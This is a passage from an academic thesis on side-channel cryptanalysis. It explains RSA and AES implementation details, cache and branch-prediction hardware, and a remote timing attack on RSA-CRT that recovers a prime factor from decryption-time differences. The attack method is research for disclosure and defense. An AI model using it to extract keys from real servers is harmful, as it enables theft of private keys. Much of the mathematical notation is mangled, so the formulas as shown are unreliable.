Architecture: [41, 78, 33, 91, 92] 2.1. Basics of RSA and Its Implementations In this section we give the necessary information about RSA and specific implementation techniques in order to make the reader understand the attacks we explain in the next sections. We start with an overview of the RSA cryptosystem. Then we cover some of the exponentiation techniques and efficient modular multiplication algorithms. All of these algorithms are currently being used in various 14 implementations of RSA. The reader should note that this section is not comprehensive in terms of the algorithms used in RSA implementations. However we cover everything necessary to grasp the basic ideas presented in this document. 2.1.1. Overview of RSA RSA is a public key cryptosystem which is developed by Rivest, Shamir and Adleman [82]. The main computation in RSA decryption is the modular exponentiation P = M d (mod N ) , where M is the message or the ciphertext, d is the private key that is a secret, and N is the public modulus which is known to anyone. Indeed, N is a product of two large primes p and q. The strength of RSA comes from the hardness of factorization problem. It is assumed that even though N is a publicly known number, the factors of N cannot be calculated. If an adversary obtains the secret value d, he can read all of the encrypted messages and impersonate the owner of the key. Therefore, the main purpose of using side-channel attacks on RSA is to reveal this secret value. If the adversary can factorize N , i.e. he can obtain either p or q, the value of d can easily be calculated. Hence, the attacker tries to find either p, q, or d. Since the size of the key, i.e. the size of d, in RSA is very large, e.g. around 1024 or 2048 bits, the exponentiation is very expensive in terms of execution time. Therefore the actual implementations of RSA need to employ efficient algorithms to calculate the result of this operation. In the next subsections, we will explain the most widely used algorithms, which can also be exploited in side-channel attacks. 15 2.1.2. Exponentiation Algorithms In this subsection, four different methods to compute an exponentiation are presented. For a more comprehensive treatment of exponentiation techniques, we refer the reader to [57, 64]. Let say we want to compute M d (mod N ) , where d is an n-bit number, i.e. d = (d0 , d1 , ..., dn−1 )2 . 2.1.2.1. Binary Square-and-Multiply Exponentiation Algorithm The binary version of Square-and-Multiply Algorithm (SM) is the simplest way to perform an exponentiation. Figure 2.1 shows the steps of SM, which processes the bits of d from left to right. There are also some versions of SM algorithm that process d in reverse order. The reader should note that all of the multiplications and squarings are shown as modular operations, although the basic SM algorithm computes regular exponentiations. This is because RSA performs modular exponentiation, and our focus is on this cryptosystem. In an efficient RSA implementation, all of the multiplications and squarings are performed by using a special modular multiplication algorithm called Montgomery Multiplication (c.f. Section 2.1.3). 2.1.2.2. b-ary Square-and-Multiply Exponentiation Algorithm A more advanced version of SM, which is called b-ary method, decreases the total number of multiplications during the exponentiation. In this method, the n-bit exponent d is considered to be in radix-2b form, i.e. d = (d0 , d1 , ..., dk−1 )2b , where n = k ∗ b. It requires a preprocessing phase to compute multiples of M 16 S=M for i from 1 to n − 1 do S = S ∗ S (mod N ) if di = 1 then S = S ∗ M (mod N ) return S FIGURE 2.1. Binary version of Square-and-Multiply Exponentiation Algorithm so that many multiplications can be combined during the exponentiation phase. The steps of this algorithm are shown in Figure 2.2. 2.1.2.3. Sliding Window Exponentiation This algorithm is very similar to b-ary method, except a slight modification. In b-ary method the exponent d is split into consecutive ‘windows’ of b consecutive bits. The number of multiplications can be further decreased by splitting d into odd windows of at most b consecutive bits, where the windows are not necessarily consecutive and may be separated by zero bits (c.f. Figure 2.3). 2.1.2.4. Balanced Montgomery Powering Ladder In the context of side channel attacks, c.f. [28, 59, 52], it was quickly “agreed” that simple side-channel attacks could be (simply) mitigated by avoiding 17 e1 = M for i from 2 to 2b − 1 ei = ei−1 ∗ M (mod N ) S = ed0 for i from 1 to k − 1 do b S = S 2 (mod N ) if di 6= 0 then S = S ∗ edi (mod N ) return S FIGURE 2.2. b-ary version of Square-and-Multiply Exponentiation Algorithm 18 e1 = M, e2 = M 2 (mod N ) for i from 1 to 2b−1 − 1 e2i+1 = e2i−1 ∗ e2 (mod N ) S = 1, i = 0 while i < k do if di = 0 then S = S ∗ S (mod N ) i=i+1 else find the maximum t such that t − i + 1 ≤ b, t < k, and dt = 1 l = (di , ..., dt )2 S = S2 t−i+1 ∗ el (mod N ) i=t+1 return S FIGURE 2.3. Sliding Window Exponentiation Algorithm 19 R0 = 1; R1 = M for i from 0 to n − 1 do if di = 0 then R1 = R0 ∗ R1 (mod N ) R0 = R0 ∗ R0 (mod N ) else [if di = 1] then R0 = R0 ∗ R1 (mod N ) R1 = R1 ∗ R1 (mod N ) return R0 FIGURE 2.4. Balanced Montgomery Powering Ladder the unbalanced and key-dependent conditional branch in the above Figures 2.1 and 2.3, and just insert dummy operations into the flow in order to make the operations after the conditional branch more balanced, c.f. [52]. As this “dummy equipped” binary SM algorithm still had some negative side-effects, a very active research area arose around the so called Balanced Montgomery Powering Ladder, as shown in the Figure 2.4. This exponentiation is assumed to be “intrinsically secure” against simple side-channel attacks, c.f. [52], and also has many computational advantages over the above basic SM algorithm. Unfortunately, as we explain later in Chapter 7, that all those “balanced branch” exponentiation algorithms are “intrinsically insecure” in the presence of Branch Prediction attacks. 20 2.1.3. Montgomery Multiplication Montgomery Multiplication (MM) is the most efficient algorithm to compute a modular multiplication. It uses additions and divisions by powers of 2, which can be accomplished by shifting the operand to the right, to calculate the result; therefore it is very suitable for hardware architectures. Since it eliminates time consuming integer division operations, the efficiency of the algorithm is very high. Montgomery Multiplication is used to calculate Z = A ∗ B ∗ R−1 (mod N ) , where A and B are the N -residues of a and b with respect to R, R is a constant power of 2, and R−1 is the inverse of R in modulus N . A = a ∗ R (mod N ), B = b ∗ R (mod N ), R−1 ∗ R = 1 (mod N ), and R > N . Another constraint is that R has to be relatively prime to N . But since N is a product of two large primes in RSA, choosing an R of a power of 2 is sufficient to guarantee that these two numbers are relatively prime. Let N be a k-bit odd number, then 2k is the most suitable value for R. A conversion to and from N -residue format is required to use this algorithm. Hence, it is more attractive to be used for repeated multiplications on the same residue, just like modular exponentiations. Figure 2.5 shows the algorithm to compute Montgomery multiplication. The conditional subtraction (S − N ) in the third line is called ‘extra reduction’. This conditional subtraction step is the 21 S =A∗B S = (S − (S ∗ N −1 mod R) ∗ N )/R if S > N then S = S − N return S FIGURE 2.5. Montgomery Multiplication Algorithm main source of data dependent execution time variations exploited in classical timing attacks on RSA (c.f. Chapter 3 and [6, 21, 34, 85, 88]). 2.1.4. Chinese Remainder Theorem Chinese Remainder Theorem (CRT) is one of the oldest and most famous theorems in Number Theory. We will not explain the details of CRT in this paper, but only the use of it to fasten RSA operations. Instead of computing P = M d (mod N ) directly, a more complex method can be used to perform the same operation roughly 4 times faster. The algorithm is described in Figure 2.6. Using Chinese Remainder Theorem, we replace modular exponentiation with fulllength modulus N by two modular exponentiations with half-length modulus p and q. Note that this method can only be used by the owner of the secret key since it requires the knowledge of the factors of N. 22 Step 1: a) up := M (mod p) b) dp := d (mod p − 1) d c) P1 := upp (mod p) Step 2: a) uq := M (mod q) b) dq := d (mod q − 1) d c) P2 := uq q (mod q) Step 3: Return ((p−1 (mod q)) ∗ (P2 − P1 ) (mod q)) ∗ p + P1 FIGURE 2.6. RSA with CRT 2.2. Basics of AES and Its Implementations 2.2.1. Overview of AES Rijndael ( [31]) is a symmetric block cipher, which was announced as Advanced Encryption Standard (AES) by NIST [8]. AES allows key sizes of 128, 192, and 256 bits; and operates on 128-bit blocks. For simplicity, we will describe only the 128-bit version of the algorithm in this document. AES performs operations on a 4x4 byte-matrix, called State, which is the basic data structure of the algorithm. The algorithm composed of a certain number of rounds depending on the length of the key. When the key is 128 bits long, the encryption algorithm has 10 rounds of computations, all except the last one of which performs the same operations. Each round has different component func- 23 tions and a round key, which is derived from the original cipherkey. The four component functions are 1. SubBytes Transformation, 2. ShiftRows Transformation, 3. MixColumns Transformation, 4. and AddRoundKey Operation. The AES encryption algorithm has an initial application of the AddRoundKey operation followed by 9 rounds and a final round. The first 9 rounds use all of these component functions in the given order. The MixColumns Transformation is excluded in the last round. A separate key scheduling function is used to generate all of the round keys, which are also represented as 4x4 byte-matrices, from the initial key. The details of the algorithm can be found in [31] and [8]. 2.2.2. AES Software Implementations The primary concern of the software implementations of AES is the efficiency in terms of speed. Many efficient implementations have been proposed since the selection of Rijndael as AES. In this paper, we will focus on the one described in [31], which is the most efficient and the most widely used one. In this implementation, all of the component functions, except AddRoundKey, are combined into four different tables and the rounds turn to be composed of table lookups and bit-wise xor operations (Figure 2.7). Before the first round, there is an extra round key addition, which adds the cipherkey to the state that 24 . FIGURE 2.7. Round operations in AES has the actual plaintext. In other words, the input to the first table lookup is the bitwise addition of the plaintext and the cipherkey. The most widely used software implementation of AES is described in [31] and it is designed especially for 32-bit architectures. To speed up encrytion, all of the component functions of AES, except AddRoundKey, are combined into lookup tables and the rounds turn to be composed of table lookups and bitwise exclusive-or operations. The five lookup tables T0, T1, T2, T3, T4 employed in this implementation are generated from the actual AES S-box values as the following way: T 0[x] = (2 • s(x), s(x), s(x), 3 • s(x)), T 1[x] = (3 • s(x), 2 • s(x), s(x), s(x)), T 2[x] = (s(x), 3 • s(x), 2 • s(x), s(x)), T 3[x] = (s(x), s(x), 3 • s(x), 2 • s(x)), 25 T 4[x] = (s(x), s(x), s(x), s(x)) , where s(x) and • stand for the result of an AES S-box lookup for the input value x and the finite field multiplication in GF(28 ) as it is realized in AES, respectively. The round computations, except in the last round, are in the form: (r+1) (r+1) (r+1) (r+1) r r r r )⊕ , RK(4∗i+3) , RK(4∗i+2) , RK(4∗i+1) (S(4∗i) , S(4∗i+1) , S(4∗i+2) , S(4∗i+3) ) = (RK(4∗i) r r T 0[S(4∗i) ] ⊕ T 1[S(4∗i+5 mod 16) ] r ⊕ T 2[S(4∗i+10 mod 16) ] r ⊕ T 3[S(4∗i+15 mod 16) ] , where Sir is the byte i of intermediate state value that becomes the input of round r, RKir is the ith byte of the rth round key and i ∈ {0, .., 3}. 2.3. Basics of Computer Microarchitecture: Cache and Branch Prediction In this section, we outline the basics of some processor components, which have been identified as sources of side-channel leakage. Although it is beneficial — in order to completely understand the attacks as described later — to know many details about modern computer architecture and especially cache and branch prediction schemes, it is unrealistic to explain all these subtle details here. Thus, we refer the reader to [78, 91, 92] for a thorough treatment of these topics. Nevertheless, we now explain the basic concepts common to most cache and branch prediction units, although the exact details differ from processor to processor and are not completely documented in freely available processor manuals. 2.3.1. Processor Cache A high-frequency processor needs to retrieve the data at a very high speed in order to utilize its functional resources. The latency of a main memory is not 26 short enough to match this demand of high speed data delivery. The gap between the latency of main memories and the actual demand of processors has been and will be continuously increasing as Moore’s Law holds. Common to all processors, the attempt to close this gap is the employment of a special buffer called cache. A cache is a small and fast memory area used by the processor to reduce the average time to access main memory. It stores copies of the most frequently used data.1 Employment of cache in a processor reduces the average memory access time because data, including instructions, has several locality properties that can be taken advantage of. Temporal locality is one of these properties and it exploits the assumption that recently used data will probably be needed in the near future. The other property is the spatial locality, which assumes that the nearby data of a currently used one will also be needed in the near future. When the processor needs to read a location in main memory, it first checks to see if the data is already in the cache. If the data is already in the cache (a cache hit), the processor immediately uses this data instead of accessing the main memory, which has a longer latency than a cache. Otherwise (a cache miss), the data is read from the memory and a copy of it is stored in the cache. This copy is expected to be used in the near future due to the temporal locality property. The minimum amount of data that can be read from the main memory into the cache at once is called a cache line or a cache block, i.e., each cache miss causes a cache block to be retrieved from a higher level memory. The reason why a block of data is transferred from the main memory to the cache instead of transfering only the data that is currently needed lies in spatial locality property. 1 Although it depends on the particular data replacement policy, this assumption is true almost all the time for current processors. 27 Design and implementation of a cache take several parameters into consideration to meet the desired cost/performance metrics. These parameters include: • number of levels of cache • size of these caches • latency of these caches • penalty of a cache miss in these levels • size of a cache block in these levels • overhead of updating main memory and higher level caches Further details on these parameters and specific values used in particular processors are not given in this document, but can be found in [43, 78, 39]. Before moving on to the next section, where we describe the basics of branch prediction, we want to mention two very important concepts that affect the performance of a cache: the mapping strategy and the replacement policy. Cache mapping strategy is the method of deciding where to store, and thus to search for, a data in a cache. Three main cache mapping strategies are direct, fully associative and set associative mapping. In a direct mapped cache, a particular data block can only be stored in a single certain location in the cache. On the contrary, a data block can be placed in any location in a fully associative cache. The location of a particular placement is determined by the replacement policy. Set associative mapping is a blend of these two mapping strategies. Set associative caches are divided into a number of same size sets and each set contains the same fixed number of cache blocks. A data block can be stored only in a certain cache set (just like in a direct mapped cache), however it can be placed in any 28 location inside this set (like in a fully associative cache). Again, the particular location of a data inside its cache set is determined by the replacement policy. The replacement policy is the method of deciding which data block to evict from the cache in order to place the new one in. The ultimate goal is to choose the data that is most unlikely to be used in the near future. There are several cache replacement policies proposed in the literature (c.f. [43, 78]). In this document, we focus on a specific one: least-recently-used (LRU). It is the most commonly used policy and it picks the data that is least recently used among all of the candidate data blocks that can be evicted from the cache. 2.3.2. Branch Prediction Units Deep CPU pipelines paired with the CPU’s ability to fetch and issue multiple instructions at every machine cycle led to the concept of superscalar processors. Superscalar processors admit a theoretical or best-case performance of less than 1 machine cycle per completed instructions, c.f. [92]. However, the inevitably required branch instructions in the underlying machine languages were very soon recognized as one of the most painful performance killers of superscalar processors. Not surprisingly, CPU architects quickly invented the concept of branch predictors in order to circumvent those performance bottlenecks. Thus, it is not surprising that there has been a vibrant and very practical research on more and more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately we identify branch prediction as a novel and unforeseen side-channel, thus being another new security threat within the computer security field. Superscalar processors have to execute instructions speculatively to overcome control hazards, c.f. [92, 78]. The negative effect of control hazards on the 29 effective machine performance increases as the depth of pipelines increases. This fact makes the efficiency of speculation one of the key issues in modern superscalar processor design. The solution to improve the efficiency is to speculate on the most likely execution path. The success of this approach depends on the accuracy of branch prediction. Better branch prediction techniques improve the overall performance a processor can achieve, c.f. [92, 78]. A branch instruction is a point in the instruction stream of a program where the next instruction is not necessarily the next sequential one. There are two types of branch instructions: unconditional branches (e.g. jump instructions, goto statements, etc.) and conditional branches (e.g. if-then-else clauses, for and while loops, etc.). For conditional branches, the decision to take or not to take the branch depends on some condition that must be evaluated in order to make the correct decision. During this evaluation period, the processor speculatively executes instructions from one of the possible execution paths instead of stalling and awaiting for the decision to come through. Thus, it is very beneficial if the branch prediction algorithm tries to predict the most likely execution path in a branch. If the prediction is true, the execution continues without any delays. If it is wrong, which is called a misprediction, the instructions on the pipeline that were speculatively issued have to be dumped and the execution starts over from the mispredicted path. Therefore, the execution time suffers from a misprediction. The misprediction penalty obviously increases in terms of clock cycles as the depth of pipeline extends. To execute the instructions speculatively after a branch, the CPU needs the following information: • The outcome of the branch. The CPU has to know the outcome of a branch, i.e., taken or not taken, in order to execute the correct instruction sequence. However, this information is not available immediately when a branch is 30 issued. The CPU needs to execute the branch to obtain the necessary information, which is computed in later stages of the pipeline. Instead of awaiting the actual outcome of the branch, the CPU tries to predict the instruction sequence to be executed next. This prediction is based on the history of the same branch as well as the history of other branches executed just before the current branch, cf. [92]. • The target address of the branch. The CPU tries to determine if a branch needs to be taken or not taken. If the prediction turns out to be taken, the instructions in the target address have to be fetched and issued. This action of fetching the instructions from the target address requires the knowledge of this address. Similar to the outcome of the branch, the target address may not be immediately available too. Therefore, the CPU tries to keep records of the target addresses of previously executed branches in a buffer, the so called Branch Target Buffer (BTB). Overall common to all Branch Prediction Units (BPU) is the following Figure 2.8. As shown, the BPU consists of mainly two “logical” parts, the BTB and the predictor. As said already above, the BTB is the buffer where the CPU stores the target addresses of the previously executed branches. Since this buffer is limited in size, the CPU can store only a number of such target addresses, and previously stored addresses may be evicted from the buffer if a new address needs to be stored instead. The predictor is that part of the BPU that makes the prediction on the outcome of the branch under question. There are different parts of a predictor, i.e., Branch History Registers (BHR) like the global history register or local his- 31 . FIGURE 2.8. Branch Prediction Unit Architecture tory registers, and branch prediction tables, cf. [92]. Further details of branch prediction can be found in [78, 91, 92]. 32 3. REMOTE TIMING ATTACK ON RSA Several timing attacks have been developed against specific RSA implementations since the introduction of side channel cryptanalysis in [59]. For example, [59] and [34] describe timing attacks on RSA implementations which do not utilize Chinese Remainder Theorem (CRT). These attacks were generalized and optimized by advanced stochastic methods (c.f. [86, 88, 87]). Since these attacks cannot be applied to RSA implementations that use CRT, it had been thought for years that RSA-CRT was immune to timing attacks. However, in [85], a new and efficient attack on RSA implementations that use CRT with Montgomery’s multiplication algorithm was introduced. Under optimal conditions, it takes about 300 timing measurements to factorize 1024-bit RSA moduli. We note that these attacks can be prevented by blinding techniques (c.f. [59], Sect. 10). Typical targets of timing attacks are the security features in smart cards. Despite of Bleichenbacher’s attack ( [16]), which (e.g.) exploited weak implementations of the SSL handshake protocol, the vulnerability of RSA implementations running on servers was not known until Brumley and Boneh performed a timing attack over a local network in 2003 ( [21]). They mimicked the attack introduced in [85] to show that RSA implementation of OpenSSL [71], which is the most widely used open source crypto library, was not immune to such attacks. Although blinding techniques for smart cards had already been ‘folklore’ for years, various crypto libraries that were used by SSL implementations did not apply these countermeasures at that time (c.f. [21]). In this section, we present a timing attack, which is an improvement of [21] by a factor of more than 10 [6]. All of these timing attacks ( [59, 34, 88, 33 85, 21]) including the one presented in this chapter can be prevented by base blinding or exponent blinding. However, it is always desirable to understand the full risk potential of an attack in order to confirm the trustworthiness of existing or, if necessary, to develop more secure and efficient countermeasures and implementations. Our attack exploits the peculiarity of the sliding windows exponentiation algorithm and, independently, suggests a general improvement of the decision strategy. Although it is difficult to compare the efficiency of attacks performed in different environments (c.f. [21]), it is obvious that our new attack improves the efficiency of Brumley and Boneh’s attack by a factor of at least 10. 3.1. General Idea of a Timing Attack on RSA-CRT Most of the RSA implementations use Chinese Remainder Theorem (CRT) to compute the modular exponentiation. CRT reduces the computation time by about 75%, compared to a straight-forward exponentiation (c.f. Section 2.1.4). Montgomery Multiplication (MM) is the most efficient algorithm to compute modular multiplications during a modular exponentiation. Since it eliminates time consuming integer divisions, the efficiency of the algorithm is very high. See Sections 2.1.4 and 2.1.3 for details of these algorithms. Since the operand size of the arithmetic operations can simply be assumed to be constant during RSA exponentiation, the time required to perform integer operations in MM can also be assumed to depend only on the constants N and R but not on the operands A and B. This assumption is very reasonable for smart cards whereas software implementations may process small operands (i.e., those with leading zero-words) faster due to optimizations of the integer multiplication 34 1.) ȳ1 := M M (M, R2 ; n) (= M*R (mod n)) 2.) Modular Exponentiation Algorithm a) table initialization (if necessary) b) exponentiation phase 3.) Return MM(temp,1;n) ( =M d (mod n) ) FIGURE 3.1. Modular Exponentiation with Montgomery’s Algorithm algorithm. In fact, this is the case for many SSL implementations which complicates the attack described in [21] and ours. (Both attacks are chosen-input attacks where small operands occur.) Under the simplifying assumption from above, we can conclude that Time(M M (A, B; N )) ∈ {c, c+cER }, where Time(M M (A, B; N )) is the execution time of M M (A, B; N ) and M M (A, B; N ) is the Montgomery multiplication with the input values A, B, and N . The Montgomery operation requires a processing time of c + cER iff the extra reduction has to be carried out. In the rest of this chapter, we denote the public RSA modulus as n instead of the capital letter N , because we need to use N to denote another variable. Figure 3.1 explains how Montgomery’s multiplication algorithm can be combined with arbitrary modular exponentiation algorithms to compute M d ( mod n). The variable temp in Phase 3 represents the result of the exponentiation phase. Of course, in Phase 2a and 2b modular squarings and multiplications have to be replaced by the respective Montgomery operations. 35 The different attacks [85] and [21] exploit the timing behavior of the Montgomery multiplications in Phase 2b of the modular exponentiation (c.f. Figure 3.1). We can interpret the execution time of the ith Montgomery operation in Phase 2b (squaring or a multiplication by a table value) as a realization of the random variable c + Wi · cER where W1 , W2 , . . . denotes a sequence of {0, 1}-valued random variables. The stochastic process W1 , W2 , . . . has been studied in detail in [86, 85, 87]. We merely mention that 1 n for MM(temp, temp; n) 3R E(Wi ) = ȳ 1 j n for MM(temp, ȳj ; n). 2 n R (3.1) where ȳj and temp denote a particular table entry and an intermediate result during the exponentiation, respectively. ‘E(·)’ denotes the expectation of a random variable. The timing behavior of the Montgomery operations in Phase 2a) can similarly be described by a process W10 , W20 , . . .. When applying the CRT, (3.1) indicates that the probability of an extra reduction during a Montgomery multiplication of the intermediate result temp with ȳ1;p = M ∗ R (mod p) in Step 1 (resp. with ȳ1;q = M ∗ R (mod q) in Step 2) is linear in ȳ1;p /p (resp. linear in ȳ1;q /q). Note that the message (u ∗ R−1 )(mod n) corresponds to the value u during the exponentiation, because the messages are multiplied by R to convert them into Montgomery form. If the base of the exponentiation is y := uR−1 (mod n), then ȳ1;p = yR ≡ u (mod p) and ȳ1;q = yR ≡ u (mod q). The same equation also implies that the same probability does not depend on y during the squarings. For 0 < u1 < u2 < n with u2 − u1 p, q, three cases are possible: The ‘interval set’ {u1 + 1, . . . , u2 } contains no multiple of p or q (Case A), contains a multiple of p or q but not both (Case B), or contains multiples of both p and 36 q (Case C). The running time for input y := uR−1 (mod n), denoted by T (u), is interpreted as a realization of a normally distributed random variable Xu . If the square and multiply exponentiation algorithm is applied, the computation of P1 durign the CRT operations (c.f. Figure 2.6) requires about log2 (n)/4 multiplications with ȳ1;p , and hence (3.1) implies 0 √ n E(Xu2 − Xu1 ) ≈ − cER log2 (n) 8 R √ − cER n log (n) 2 4 R for Case A for Case B for Case C This property allows us to devise a timing attack that factorizes the modulus n by exposing one of the prime factors, e.g. q, bit by bit. We use the fact that if the interval (u1 , u2 ], i.e., the integers in {u1 + 1, u1 + 2, ..., u2 }, contains a multiple of q, i.e., in case of Case B or C, then T(u1 ) - T(u2 ) will be smaller √ than cER log2 (n) n/16R. Let say the attacker already knows that q is in (u1 , u2 ] (after checking several intervals; = Phase 1 of the attack) and trying to reduce the search space. In Phase 2 the decision strategy becomes: 1. Split the interval into two equal parts: (u1 , u3 ] and (u3 , u2 ], where u3 = b(u1 + u2 )/2c. As usual, bzc denotes the largest integer that is ≤ z. √ 2. If T (u3 ) − T (u2 ) < cER log2 (n) n/16R decide that q is in (u3 , u2 ], otherwise in (u1 , u3 ]. 3. Repeat the first steps until the final interval becomes small enough to factorize n using the Euclidean algorithm At any time within Phase 2 the attacker can check whether her previous decisions have been correct. To confirm that an interval really contains q the 37 attacker applies the decision rule to similar but different intervals, e.g., (u1 + 1, u2 − 1], and confirms the interval if they yield the same decision. In fact, it is sufficient to recover only the upper half of the bit representation of either p or q to factorize n by applying a lattice-based algorithm [27]. Under ideal conditions (no measurement errors) this attack requires about 300 time measurements to factorize a 1024-bit RSA modulus n ≈ 0.7 · 21024 , if square and multiply algorithm is used. In Phase 2 of the attack, each decision essentially recovers one further bit of the binary representation of one prime factor. The details and analysis of this attack can be found in [85]. 3.2. Overview of Brumley and Boneh Attack We explain the attack of [21], which will be refered as BB-attack from here on, and ours in the following two sections along with a discussion of the advantages of our attack over the other. RSA implementation of OpenSSL version 0.9.7 used to employ Montgomery Multiplication, CRT, and Sliding Window Exponentiation (SWE) with a window size, denoted by wsize, of 5. 1 SWE algorithm processes the expo- nent d by splitting it into odd windows of at most wsize consecutive bits (i.e. 1 At the time our paper ( [6]) was written, the latest version of OpenSSL Library was 0.9.7. They changed this particular RSA implementation configuration and started to employ b-ary exponentiation algorithm with additional mitigation techniques to protect RSA against cache-based side-channel attacks starting with version 0.9.8 after the certain advances on microarchitectural side-channel area discussed in the later chapters of this document. 38 in substrings of length ≤ wsize having odd binary representation), where the windows are not necessarily consecutive and may be separated by zero bits (c.f. Section 2.1.2.3). It requires a preprocessing phase, i.e., table initialization, to compute odd powers of the base y so that many multiplications can be combined during the exponentiation phase. The modulus n is 1024-bit number, which is the product of two 512bit primes p and q. Considering one of these primes, say q, the computation d of yq q (modq) requires 511 Montgomery operations of type MM(temp, temp; q) (‘squarings’) and approximately (511 · 31)/(5 · 32) ≈ 99 multiplications with the table entries during the exponentiation phase of SWE (cf. Table 14.16 in [64]). Consequently, in average ≈ 6.2 multiplications are carried out with the table entry ȳ1;q . BB-Attack exploits the multiplications MM(temp, ȳ1;q ; q) that are carried out in the exponentiation phase of SWE. Assume that the attacker tries to recover q = (q0 , ..., q511 ) and already obtained first, i.e. most significant, k bits. To guess qk , the attacker generates g and ghi , where g = (q0 , ..., qk−1 , 0, 0, ..., 0) and ghi = (q0 , ..., qk−1 , 1, 0, 0, ..., 0). Note that there are two possibilities for q: g < q < ghi (when qk = 0) or g < ghi < q (when qk = 1). She determines the decryption time t1 = T (g) = T ime(udg mod n) and t2 = T (ghi ) = T ime(udghi mod n), where ug = g ∗ R−1 (mod n) and ughi = ghi ∗ R−1 (mod n). If qk is 0, then |t1 − t2 | must be “large”. Otherwise |t1 − t2 | must be close to zero, which implies that qk is 1. The message ug (ughi resp.) corresponds to the value g (ghi resp.) during the exponentiations, because of the conversion into Montgomery form. BB-attack does not only compare the timings for gR−1 ( mod n) and ghi R−1 (mod n) but uses the whole neighborhoods of g and ghi , i.e., N (g; N ) = {g, g + 1, . . . , g + N − 1} and N (ghi ; N ) = {ghi , ghi + 1, . . . , ghi + N − 1}, respec- 39 tively. The parameter N is called the neighborhood size. For details, the reader is referred to [21]. 3.3. Details of Our Approach Only about 6 from ca. 1254 many Montgomery operations performed in RSA exponentiation provide useful information for BB-attack. On the other hand, the table initialization phase of the exponentiation in modulo q requires 15 Montgomery multiplications with ȳ2 . Therefore, we exploit these operations in our √ attack. In fact, let R05 = 2256 = R, the square root of R over the integers. Clearly, for input y = u(R05)−1 (mod n) (inverse in the ring Zn ) we have ȳ2;q = MM(ȳ1 , ȳ1 ; q) = u(R05)−1 u(R05)−1 R ≡ u2 (mod q). (3.2) Instead of N (g, N ) and N (ghi , N ) we consequently consider the neighborhoods N (h; N ) = {h, h+1, . . . , h+N −1} and N (hhi ; N ) = {hhi , hhi +1, . . . , hhi +N −1}, resp., where √ √ h = b gc and hhi = b ghi c. (3.3) To be precise, we consider input values y = u(R05)−1 (mod n) with u ∈ N (h; N ) or u ∈ N (hhi ; N ). Even if we just directly copy the other steps of BBattack, this will increase the efficiency by a factor of ≈ (15.0/6.2)2 ≈ 5.8. Under the assumption from Section 3.1, specifically Time(MM(a, b; q)) ∈ {c, c + cER } √ for any a, b ∈ Zq , we can simply replace the threshold value log2 (n) cER n/16R √ by 60 cER n/16R. Clearly, the absolute value of this new threshold is much 40 smaller, which makes the attack less efficient in terms of the number of necessary measurements. The situation in an actual attack is more complicated as pointed out in [21]. First of all, there are two different integer multiplication algorithms used to compute MM(a, b; q): Karatsuba’s algorithm (if a and b consist of the same number of words (nwords)) and the ‘normal’ multiplication algorithm (if a and b consist of different numbers of words (nwords, mwords)). Karatsuba’s algorithm has a complexity of O(nwords1.58 ), whereas the normal multiplication algorithm requires O(nwords · mwords) operations. Normally, the length of each input of Montgomery multiplication is 512 bits, therefore Karatsuba’s algorithm is supposed to be applied during RSA exponentiation. However, BB-attack and ours are chosen-input attacks and some operands may be very small, e.g., ȳ1;q in BB-attack and ȳ2;q in our attack. Beginning with an index (denoting the actual exponent bit under attack) near the word size 32, the value of ȳ1;q , resp. ȳ2;q , has leading zero words so that the program applies normal multiplication. Unfortunately, the effects of having almost no extra reduction for small table values but using less efficient integer multiplications counteract each other. Moreover, the execution time of integer multiplications becomes less and less during the course of the attack (normal multiplication algorithm!). It is worked out in [21] that the time differences of integer multiplications depend on the concrete environment, i.e., compiler options etc. Neither in [21] nor in this chapter, we assume that the attacker knows all of these details. Instead, robust attack strategies that work for various settings are used in both cases. BB-attack evaluates the absolute values 41 N −1 X Time (g + j)R−1 (mod n) − = j=0 N −1 X Time (ghi + j)R−1 (mod n) . ∆BB (3.4) j=0 ∆BB becomes ‘small’ when dk = 1, whereas a ‘large’ value indicates that dk = 0 [21]. Our pendant is ∆= N −1 X Time (h + j)(R05)−1 (mod n) − j=0 N −1 X Time (hhi + j)(R05)−1 (mod n) , (3.5) j=0 where we omit the absolute value. √ Since (u + x)2 − u2 ≈ 2x q for u ∈ N (h, N ) or u ∈ N (hhi , N ), the value ∆ can only be used to retrieve the bits i ≤ 256 − 1 − log2 (N ). In fact, it is recommended to stop even at least two or three bits earlier. The remaining bits upto 256th bit of q can be determined by either using the former equation or searching exhaustively. Network traffic and other delays affect timing measurements, because we can only measure response times rather than mere encryption times. For that reason, identical input values are queried S many times, where S is one of the parameters in BB-attack, to decrease the effect of outliers in [21]. We drop this parameter in our attack, because increasing the number of different queries serves the same purpose as well. If ∆BB or |∆| are ‘large’ (in relation to their neighborhood size N ), that is, if ∆BB > N · thBB;i , resp. |∆| > N · thi for suitable threshold values thBB;i and thi (both depending on the index i) the attacker guesses qi = 0, otherwise she decides for qi = 1. 42 On the other hand, sequential sampling exploits the fact that already a fraction of both neighborhood values usually yields the correct decision with high probability. We can apply a particular decision rule not to sums of timings (i.e., to ∆) but successively to individual timing differences ∆j = Time (h + j)(R05)−1 (mod n) − Time (hhi + j)(R05)−1 (mod n) (3.6) for j = 0, 1, . . . , Nmax . The attacker proceeds until the difference #{j | qei;j = 0} − #{j | qej;i = 1} ∈ {m1 , m2 }, (3.7) or a given maximum neighborhood size Nmax is reached. The term qei;j denotes j th individual decision for qi , and the numbers m1 < 0 and m2 > 0 are chosen with regard to the concrete decision rule. If the process ends at m1 (resp. at m2 ) the attacker assumes that qi = 1 (resp. that qi = 0) is true. If the process terminates because the maximum neighborhood size has been exceeded the attacker’s decision depends on the difference at that time and on the concrete individual decision rule (cf. [36], Chap. XIV, and [85], Sect. 7). The fact that the distribution of the differences varies in the course of the attack causes another difficulty. As pointed out earlier we do not assume that the attacker has full knowledge on the implementation details and hence not full control on the changes of the distribution. A possible individual decision rule could be, for instance, whether the absolute value of an individual time difference exceeds a particular bound thi (→ decision qei;j = 0). The attacker updates this threshold value whenever he assumes that a current bit qi equals 1. The new threshold value depends on the old one and the actual normalized value |∆|/Ne where Ne denotes the number of exploited individual timing differences. 43 We use an alternative decision strategy that is closely related to this approach. For k ∈ {0, 1}, we define fi;≥;k = Pr(∆j ≥ 0 | qi = k), (3.8) fi;<;k = Pr(∆j < 0 | qi = k). (3.9) and similarly We want to mention that the following equation surely holds due to the reasons given above. max{fi;≥;0 , fi;<;0 } > max{fi;≥,1 , fi;<,1 }. (3.10) The right-hand maximum should be close to 0.5. We subtract the number of negative timing differences from the number of non-negative ones. The process terminates when this difference equals m1 = −D or m2 = +D > 0, or until a particular maximum neighborhood size Nmax is reached. For Nmax = ∞, the process will always 